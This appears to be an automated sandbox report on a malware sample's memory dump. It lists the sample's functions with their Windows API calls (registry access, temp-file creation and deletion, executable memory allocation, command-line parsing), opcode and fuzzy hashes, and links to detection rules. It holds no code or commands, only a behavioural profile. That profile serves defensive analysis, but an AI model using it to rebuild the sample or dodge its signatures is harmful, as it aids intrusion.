Function 046211C1, Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 046211E5
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 046211F7
wcstombs.NTDLL ref: 04621205
lstrlen.KERNEL32(00000000,?,?,?,?,?), ref: 04621229
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0462123E
mbstowcs.NTDLL ref: 0462124B
HeapFree.KERNEL32(00000000,00000000), ref: 0462125D
HeapFree.KERNEL32(00000000,00000000,?,?), ref: 04621277

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
String ID:
API String ID: 316328430-0
Opcode ID: b7458d5889dad139c176517ff125b6440fac467a516311522ed510397b6cca41
Instruction ID: 48b674783e72a7a9936676187d3e3b46e0edf7ab22253d1296c8e2492a43ec7a
Opcode Fuzzy Hash: b7458d5889dad139c176517ff125b6440fac467a516311522ed510397b6cca41
Instruction Fuzzy Hash: C721AC3550020AFBDF108FA0DD09F8A7B79EB94301F104121F601A21A0EB75DDA0DF60

Uniqueness

Uniqueness Score: -1.00%

Function 04633ED8, Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000040,00000000,?), ref: 04633EE4
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04633F02
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04633F0A
DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 04633F28
GetLastError.KERNEL32 ref: 04633F3C
RegCloseKey.ADVAPI32(?), ref: 04633F47
CloseHandle.KERNEL32(00000000), ref: 04633F4E
GetLastError.KERNEL32 ref: 04633F56

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
String ID:
API String ID: 3822162776-0
Opcode ID: d3b2c24d70ee7331f1bb52a8233d06295a067aede54f6e4b8fb84802318a6179
Instruction ID: dcf1668bcdd7f09fa470c059c35b3cddfbc1c77005b76f622abaab647df5e37f
Opcode Fuzzy Hash: d3b2c24d70ee7331f1bb52a8233d06295a067aede54f6e4b8fb84802318a6179
Instruction Fuzzy Hash: 15115E7A200249BFDF115F60EC49B693B79EB84762F405024FE1586340FB35DCA4DB20

Uniqueness

Uniqueness Score: -1.00%

Function 0462327C, Relevance: 11.5, APIs: 9, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b8801ba98132c36f9ba966f737afdad6a1e4f4520b755b7679010cd6b8e08128
Instruction ID: 054b16c7adb5cd8fb8930b0a927029a4de7a4706c325e63b86b2952ed2e710c5
Opcode Fuzzy Hash: b8801ba98132c36f9ba966f737afdad6a1e4f4520b755b7679010cd6b8e08128
Instruction Fuzzy Hash: 4EA1E871D00A19FFEF229FA4CE04AEEBBB5EF54314F104069E911A2260E735AA95DF10

Uniqueness

Uniqueness Score: -1.00%

Function 0462F579, Relevance: 10.7, APIs: 7, Instructions: 165stringmemoryCOMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32(04644640,00000038,0463B8A1,00000000,73BCF5B0,046412BB,61636F4C,00000001,?,?,?,?,?,?,?,04637FB0), ref: 0462F58A
StrChrA.SHLWAPI(00000000,00000020,?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 0462F59B

Part of subcall function 04621778: lstrlen.KERNEL32(?,00000000,73B76980,00000000,046249F6,?), ref: 04621781
Part of subcall function 04621778: memcpy.NTDLL(00000000,?,00000000,?), ref: 046217A4
Part of subcall function 04621778: memset.NTDLL ref: 046217B3

ExitProcess.KERNEL32 ref: 0462F77D

Part of subcall function 0462F836: StrChrA.SHLWAPI(00000000,?,7656D3B0,05D3C0D4,00000000,?,?,046255C8,?,00000020,05D3C0D4), ref: 0462F85C
Part of subcall function 0462F836: StrTrimA.SHLWAPI(00000000,04644510,00000000,?,?,046255C8,?,00000020,05D3C0D4), ref: 0462F87B
Part of subcall function 0462F836: StrChrA.SHLWAPI(00000000,?,?,?,046255C8,?,00000020,05D3C0D4), ref: 0462F88C
Part of subcall function 0462F836: StrTrimA.SHLWAPI(00000001,04644510,?,?,046255C8,?,00000020,05D3C0D4), ref: 0462F89E

lstrcmp.KERNEL32(?,6C656873), ref: 0462F609
VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,?,?,?,?,?,?,04637FB0,?), ref: 0462F621

Part of subcall function 04638069: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,?,?,?,0462118D,0000003A,?,?,00000000,00000000,?,?,?), ref: 046380A9
Part of subcall function 04638069: CloseHandle.KERNEL32(000000FF,?,?,?,0462118D,0000003A,?,?,00000000,00000000,?,?,?), ref: 046380B4

VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,?,?,?,?,?,?,04637FB0,?), ref: 0462F693
lstrcmp.KERNEL32(?,6C69616D), ref: 0462F6AC

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: TrimVirtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcesslstrlenmemcpymemset
String ID:
API String ID: 497132939-0
Opcode ID: b054278bbccc6c97a0012fe244c01f5adb81118fd1903e96c29dfd1550033ac3
Instruction ID: a35535b7386468ff5ceb8dc57fa8b2c19d3d2dab12ec3542bc15178c06bbc7e7
Opcode Fuzzy Hash: b054278bbccc6c97a0012fe244c01f5adb81118fd1903e96c29dfd1550033ac3
Instruction Fuzzy Hash: F0515B75A00629BFDF14AFA0DD48AEEBBB9EF49705F040029F101E6260FB74A945DF64

Uniqueness

Uniqueness Score: -1.00%

Function 04635562, Relevance: 10.6, APIs: 7, Instructions: 137memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 0463558D
StrTrimA.SHLWAPI(00000000,0A0D0920), ref: 046355AA
HeapFree.KERNEL32(00000000,00000000), ref: 046355DD
RtlImageNtHeader.NTDLL(00000000), ref: 04635606
HeapFree.KERNEL32(00000000,00000000,00000001,00000000,00000000), ref: 046356CB

Part of subcall function 04621778: lstrlen.KERNEL32(?,00000000,73B76980,00000000,046249F6,?), ref: 04621781
Part of subcall function 04621778: memcpy.NTDLL(00000000,?,00000000,?), ref: 046217A4
Part of subcall function 04621778: memset.NTDLL ref: 046217B3

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0463567C
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 046356AB

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
String ID:
API String ID: 239510280-0
Opcode ID: f578c200b52313f111f2a0734a9633c42b43f84a0695cd7c2afb2e4a2bd6d2a2
Instruction ID: 29b0a77d0837204db5b951c9c9e0b88e056f3c3f785f491b9eb64713b1dbc7dc
Opcode Fuzzy Hash: f578c200b52313f111f2a0734a9633c42b43f84a0695cd7c2afb2e4a2bd6d2a2
Instruction Fuzzy Hash: E0411439300245FBEF126B54DC44FAE7BB9EB95796F100025F902A7290FB74BE409B54

Uniqueness

Uniqueness Score: -1.00%

Function 04635409, Relevance: 10.6, APIs: 7, Instructions: 126memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,?,770F4620,?,?,?,?,04621222,?,?,?,?,?), ref: 04635463
lstrlen.KERNEL32(?,?,?,?,770F4620,?,?,?,?,04621222,?,?,?,?,?), ref: 04635481
RtlAllocateHeap.NTDLL(00000000,73B76985,?), ref: 046354AD
memcpy.NTDLL(00000000,00000000,00000000,?,770F4620,?,?,?,?,04621222,?,?,?,?,?), ref: 046354C4
HeapFree.KERNEL32(00000000,00000000), ref: 046354D7
memcpy.NTDLL(00000000,?,?,?,770F4620,?,?,?,?,04621222,?,?,?,?,?), ref: 046354E6
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,770F4620,?,?,?,?,04621222,?,?,?), ref: 0463554A

Part of subcall function 046378B2: RtlLeaveCriticalSection.NTDLL(?), ref: 0463792F

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
String ID:
API String ID: 1635816815-0
Opcode ID: aa02fdd54881ba4c5b21b79411778e1ac94677410872e7783b22bb5b64c2453f
Instruction ID: ec028bcc726410a36f5abd92a752a6f57b347f80b22f16c58bc145eda67f1f6c
Opcode Fuzzy Hash: aa02fdd54881ba4c5b21b79411778e1ac94677410872e7783b22bb5b64c2453f
Instruction Fuzzy Hash: 1641CD36900268BBDF219FA8CC44B9E7BB5EF54352F018429F906A7261F774BE50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04633796, Relevance: 10.6, APIs: 7, Instructions: 124registrymemoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL ref: 046337BF
RtlEnterCriticalSection.NTDLL(00000000), ref: 04633802
RegOpenKeyA.ADVAPI32(80000001,74666F53,?), ref: 0463381D
CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 04633873
HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 046338CF
RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 046338DD
RtlLeaveCriticalSection.NTDLL(00000000), ref: 046338E8

Part of subcall function 046382A1: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 046382B5
Part of subcall function 046382A1: memcpy.NTDLL(00000000,04638DC2,?,?,00000008,?,04638DC2,00000000,00000000,?), ref: 046382DE
Part of subcall function 046382A1: RegCloseKey.ADVAPI32(?,?,04638DC2,00000000,00000000,?,?,?,?,?,?,?,?,00000008,046360B8,00000000), ref: 04638332

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenmemcpy
String ID:
API String ID: 2070110485-0
Opcode ID: 554aef59fd77ac7cd559dd60255847fd505c7fdef973c60148ef40417818d182
Instruction ID: d145419efc88fc487c139b77b3142206914164e2b1909068b2652a75b2584509
Opcode Fuzzy Hash: 554aef59fd77ac7cd559dd60255847fd505c7fdef973c60148ef40417818d182
Instruction Fuzzy Hash: F6419C76200241ABEF219F65DC85FAA37A8EF90742F045029FD06D7340FB35E995DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04624604, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 122stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,04642D40,05D39A97,00000057), ref: 04624626
lstrlenW.KERNEL32(?,04642D40,05D39A97,00000057), ref: 04624637
lstrlenW.KERNEL32(?,04642D40,05D39A97,00000057), ref: 04624649
lstrlenW.KERNEL32(?,04642D40,05D39A97,00000057), ref: 0462465B
lstrlenW.KERNEL32(?,04642D40,05D39A97,00000057), ref: 0462466D
lstrlenW.KERNEL32(?,04642D40,05D39A97,00000057), ref: 04624679

Strings

Serv, xrefs: 0462468A, 046246EE

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: lstrlen
String ID: Serv
API String ID: 1659193697-311409126
Opcode ID: 1db09ef7b35cc340835ff1f85539cc793d736ae422391df68172d6bf5e3d5247
Instruction ID: 1b57eef6ec6939ab6b5cc6e0f8bbcbd359c9533a1125b8194709b00fa95b9d19
Opcode Fuzzy Hash: 1db09ef7b35cc340835ff1f85539cc793d736ae422391df68172d6bf5e3d5247
Instruction Fuzzy Hash: DF41FD75F0061AAFDF10DF99C980AAEB7F9EF98204B148929D515E7300FB74EA458F50

Uniqueness

Uniqueness Score: -1.00%

Function 046358F2, Relevance: 10.6, APIs: 7, Instructions: 121threadstringCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 04635933
GetWindowThreadProcessId.USER32(00000000,?), ref: 04635961
GetWindowThreadProcessId.USER32(?,?), ref: 046359A6
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 046359CE
_strupr.NTDLL ref: 046359F9
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 04635A06
CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 04635A1B

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
String ID:
API String ID: 3831658075-0
Opcode ID: 52a2eae1743944cf8767f2a15cf2b652395edb1962e9e7e7d7d2fffd8ecb75fe
Instruction ID: 9c6a049d286740cddc4cf489b48238976977f2400859ec4448287d401002d270
Opcode Fuzzy Hash: 52a2eae1743944cf8767f2a15cf2b652395edb1962e9e7e7d7d2fffd8ecb75fe
Instruction Fuzzy Hash: 0E413B7590025CFFDF219FA4CC85BEDBBB9EB48702F108456E501A3290EB74AA80DF90

Uniqueness

Uniqueness Score: -1.00%

Function 04638156, Relevance: 10.6, APIs: 7, Instructions: 111memoryfilestringCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(04647FEC), ref: 04638168
lstrcpy.KERNEL32(00000000), ref: 046381A4

Part of subcall function 0463DEFE: lstrlen.KERNEL32(00000000,?,00000020,?,00000000,04639946,00000000,7711DBB0,00000020,00000000), ref: 0463DF0D
Part of subcall function 0463DEFE: mbstowcs.NTDLL ref: 0463DF29

GetLastError.KERNEL32(00000000), ref: 04638233
HeapFree.KERNEL32(00000000,?), ref: 0463824A
InterlockedDecrement.KERNEL32(04647FEC), ref: 04638261
DeleteFileA.KERNEL32(00000000), ref: 04638282
HeapFree.KERNEL32(00000000,00000000), ref: 04638292

Part of subcall function 0462D84A: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?), ref: 0462D85C
Part of subcall function 0462D84A: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E), ref: 0462D875
Part of subcall function 0462D84A: GetCurrentThreadId.KERNEL32 ref: 0462D882
Part of subcall function 0462D84A: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E,?,00000008), ref: 0462D88E
Part of subcall function 0462D84A: GetTempFileNameA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E), ref: 0462D89C
Part of subcall function 0462D84A: lstrcpy.KERNEL32(00000000), ref: 0462D8BE

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
String ID:
API String ID: 908044853-0
Opcode ID: 6c4a4a9fe9cf7f02f055a7c667367286498532fee1e16ed889cc9c150e3471e0
Instruction ID: e0121d53a9864c4a15d71574b140ef36b2ff38589f696e5bfbbbf77129f00db9
Opcode Fuzzy Hash: 6c4a4a9fe9cf7f02f055a7c667367286498532fee1e16ed889cc9c150e3471e0
Instruction Fuzzy Hash: CC31E236900664BBCF21AFA4CC44AED7BF8EF84752F114025F9059B240FB74AE419B90

Uniqueness

Uniqueness Score: -1.00%

Function 04640EFC, Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 046277E3: GetProcAddress.KERNEL32(6F57775A,00000318), ref: 04627808

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04640F35
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04641020

Part of subcall function 046277E3: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 0462798E

VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 04640F6B
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04640F77
lstrcmpi.KERNEL32(?,00000000), ref: 04640FB4
StrChrA.SHLWAPI(?,0000002E), ref: 04640FBD
lstrcmpi.KERNEL32(?,00000000), ref: 04640FCF

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Virtual$AllocFreelstrcmpi$AddressProc
String ID:
API String ID: 1783538721-0
Opcode ID: 8d4779d5674fcd1823cd30654f02641d0c93fc62764ae53ddd5374972a8a8526
Instruction ID: 41618a15bf7843270dca3b7e5bf6d37569e69e5ba34de697410f608a0d12c151
Opcode Fuzzy Hash: 8d4779d5674fcd1823cd30654f02641d0c93fc62764ae53ddd5374972a8a8526
Instruction Fuzzy Hash: 5B318D71509361ABDB21CF11D844B5BBBE8FFC9B55F010918F984A7280EB74E944CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 04635004, Relevance: 10.6, APIs: 7, Instructions: 110memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0462D84A: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?), ref: 0462D85C
Part of subcall function 0462D84A: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E), ref: 0462D875
Part of subcall function 0462D84A: GetCurrentThreadId.KERNEL32 ref: 0462D882
Part of subcall function 0462D84A: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E,?,00000008), ref: 0462D88E
Part of subcall function 0462D84A: GetTempFileNameA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E), ref: 0462D89C
Part of subcall function 0462D84A: lstrcpy.KERNEL32(00000000), ref: 0462D8BE

StrChrA.SHLWAPI(?,0000002C,00003219), ref: 0463504A
StrTrimA.SHLWAPI(?,20000920), ref: 04635068
StrTrimA.SHLWAPI(?,0A0D0920,?,?,00000001), ref: 046350D1
HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 046350F2
DeleteFileA.KERNEL32(?,00003219), ref: 04635114
HeapFree.KERNEL32(00000000,?), ref: 04635123
HeapFree.KERNEL32(00000000,?,00003219), ref: 0463513B

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
String ID:
API String ID: 1078934163-0
Opcode ID: d1098f60d5a34d399830b67208da37448023a4ec8d032e3c407c5b3b874b01e7
Instruction ID: fda9e827d176c1a44d8887880e783853e5bdb81767e5b1c286938346d028c519
Opcode Fuzzy Hash: d1098f60d5a34d399830b67208da37448023a4ec8d032e3c407c5b3b874b01e7
Instruction Fuzzy Hash: DE31DD76204245BFEB10AF54EC04F6B73E8EB96B06F010419FA4197280FB79FD058BA2

Uniqueness

Uniqueness Score: -1.00%

Function 0462A994, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,04623B1E), ref: 0462A9AE
RtlAllocateHeap.NTDLL(00000000,00000024), ref: 0462A9C3
memset.NTDLL ref: 0462A9D0
HeapFree.KERNEL32(00000000,00000000,?,0000001A,?,?,04623B1D,?,?), ref: 0462A9ED
memcpy.NTDLL(?,?,04623B1D,?,0000001A,?,?,04623B1D,?,?), ref: 0462AA0E

Strings

chun, xrefs: 0462AA8A

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$Allocate$Freememcpymemset
String ID: chun
API String ID: 2362494589-3058818181
Opcode ID: 6f1c1726035c9a5c8862c3474128cd2df3073058fb3c2d64fa74f87dc395c570
Instruction ID: 4a72b23a95d4ffdd973659ce77eb20aadc3ffe8fafe767a6907203f5b651b79f
Opcode Fuzzy Hash: 6f1c1726035c9a5c8862c3474128cd2df3073058fb3c2d64fa74f87dc395c570
Instruction Fuzzy Hash: BF319D75500B16BFDB209FA5CE40A56B7E8EF95314F01852AE94AC7620F770F915CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04624AFE, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91memoryfilestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0462D84A: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?), ref: 0462D85C
Part of subcall function 0462D84A: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E), ref: 0462D875
Part of subcall function 0462D84A: GetCurrentThreadId.KERNEL32 ref: 0462D882
Part of subcall function 0462D84A: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E,?,00000008), ref: 0462D88E
Part of subcall function 0462D84A: GetTempFileNameA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E), ref: 0462D89C
Part of subcall function 0462D84A: lstrcpy.KERNEL32(00000000), ref: 0462D8BE

lstrlen.KERNEL32(00000000,?,00000F00), ref: 04624B22

Part of subcall function 04621000: lstrlen.KERNEL32(?), ref: 04621011
Part of subcall function 04621000: lstrlen.KERNEL32(?), ref: 04621018
Part of subcall function 04621000: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0462102A
Part of subcall function 04621000: _snprintf.NTDLL ref: 04621050
Part of subcall function 04621000: _snprintf.NTDLL ref: 04621086
Part of subcall function 04621000: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 046210A5

StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,?,?,00000F00), ref: 04624BBC
HeapFree.KERNEL32(00000000,?,?,?,00000F00), ref: 04624BD9
DeleteFileA.KERNEL32(00000000,00000000,?,?,?,00000F00), ref: 04624BE1
HeapFree.KERNEL32(00000000,00000000,?,00000F00), ref: 04624BF0

Strings

s:, xrefs: 04624BB2

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
String ID: s:
API String ID: 2960378068-2363032815
Opcode ID: 539f53eac3f58e98a1f75a8906d209c877aaffdb7d7a3592686fbb10d8d9cb11
Instruction ID: c0f5ea5495d2222b86470afd16fdd662ce09d1cd5ea4df1acec7c08380dc39dd
Opcode Fuzzy Hash: 539f53eac3f58e98a1f75a8906d209c877aaffdb7d7a3592686fbb10d8d9cb11
Instruction Fuzzy Hash: 5A317F7AA04215BFDF10DBE8CD84FDE7BACEB99355F000459E505E3241FB74AA408B60

Uniqueness

Uniqueness Score: -1.00%

Function 046367B5, Relevance: 10.6, APIs: 7, Instructions: 83stringfileCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00000000), ref: 046367CB
lstrcmpiW.KERNEL32(00000000,0065002E,73BCF710,?,?,?,0462CAE7), ref: 04636803
lstrcmpiW.KERNEL32(?,0064002E,?,?,?,0462CAE7), ref: 04636818
lstrlenW.KERNEL32(?,?,?,?,0462CAE7), ref: 0463681F
CloseHandle.KERNEL32(?,?,?,?,0462CAE7), ref: 04636847
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,0462CAE7), ref: 04636873
RtlLeaveCriticalSection.NTDLL(00000000), ref: 04636891

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
String ID:
API String ID: 1496873005-0
Opcode ID: 5057904108e081584225d9326ca3f5efa422a78d5c71cf449f21d79b137543e2
Instruction ID: 3d2dd67970c9d84d92dbf534dadcf1f52cf9c089d919a133b92cb0176db47e95
Opcode Fuzzy Hash: 5057904108e081584225d9326ca3f5efa422a78d5c71cf449f21d79b137543e2
Instruction Fuzzy Hash: EC218EB5500245BFEF209FA5DC84EAB77BCEF68606B041468A502E2211FB74FA11CB70

Uniqueness

Uniqueness Score: -1.00%

Function 0463E9D2, Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0462662B,00000000,046483A0,046483C0,?,?,0462662B,04638EE8,046483A0), ref: 0463E9E2
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0463E9F8
lstrlen.KERNEL32(04638EE8,?,?,0462662B,04638EE8,046483A0), ref: 0463EA00
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0463EA0C
lstrcpy.KERNEL32(046483A0,0462662B), ref: 0463EA22
HeapFree.KERNEL32(00000000,00000000,?,?,0462662B,04638EE8,046483A0), ref: 0463EA76
HeapFree.KERNEL32(00000000,046483A0,?,?,0462662B,04638EE8,046483A0), ref: 0463EA85

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$AllocateFreelstrlen$lstrcpy
String ID:
API String ID: 1531811622-0
Opcode ID: 0fd2715e41835a52de97ed4c7b19d7d41416b24e7b27d8d370a861d343b20073
Instruction ID: 3e9dd433d9e180f4cf130a4b4e2a1ee9b33edba78f3ee4d9d759d3cb469206dc
Opcode Fuzzy Hash: 0fd2715e41835a52de97ed4c7b19d7d41416b24e7b27d8d370a861d343b20073
Instruction Fuzzy Hash: A821043A104284BFEF224F68DC44B6A7FAAFB9A741F144058F88557351EB36AD52C770

Uniqueness

Uniqueness Score: -1.00%

Function 04637048, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,73BB81D0,00000000,00000000), ref: 0463706C

Part of subcall function 04625E00: lstrcpy.KERNEL32(-000000FC,00000000), ref: 04625E3A
Part of subcall function 04625E00: CreateDirectoryA.KERNEL32(00000000,00000000), ref: 04625E4C
Part of subcall function 04625E00: GetTickCount.KERNEL32 ref: 04625E57
Part of subcall function 04625E00: GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 04625E63
Part of subcall function 04625E00: lstrcpy.KERNEL32(00000000), ref: 04625E7D

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

lstrcpy.KERNEL32(00000000), ref: 046370A7
wsprintfA.USER32 ref: 046370BA
GetTickCount.KERNEL32 ref: 046370CF
wsprintfA.USER32 ref: 046370E4

Part of subcall function 04641844: HeapFree.KERNEL32(00000000,?,0463DF8D,00000000), ref: 04641850

Strings

"%S", xrefs: 046370B4

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
String ID: "%S"
API String ID: 1152860224-1359967185
Opcode ID: 32cf7c99ba749acd6d932535436e35abc1169d47ec32c0b402b96c816fa61fdf
Instruction ID: c48fb8442d94f4b630ddef9bc22ca889159c2963771e35cb7fb2e1cebe7ea913
Opcode Fuzzy Hash: 32cf7c99ba749acd6d932535436e35abc1169d47ec32c0b402b96c816fa61fdf
Instruction Fuzzy Hash: FA11B4B65012157FEB11BBA4DC48EAB3B9CDFC6669B054019F90897202FE38BC448BB5

Uniqueness

Uniqueness Score: -1.00%

Function 04636028, Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0462D84A: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?), ref: 0462D85C
Part of subcall function 0462D84A: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E), ref: 0462D875
Part of subcall function 0462D84A: GetCurrentThreadId.KERNEL32 ref: 0462D882
Part of subcall function 0462D84A: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E,?,00000008), ref: 0462D88E
Part of subcall function 0462D84A: GetTempFileNameA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E), ref: 0462D89C
Part of subcall function 0462D84A: lstrcpy.KERNEL32(00000000), ref: 0462D8BE

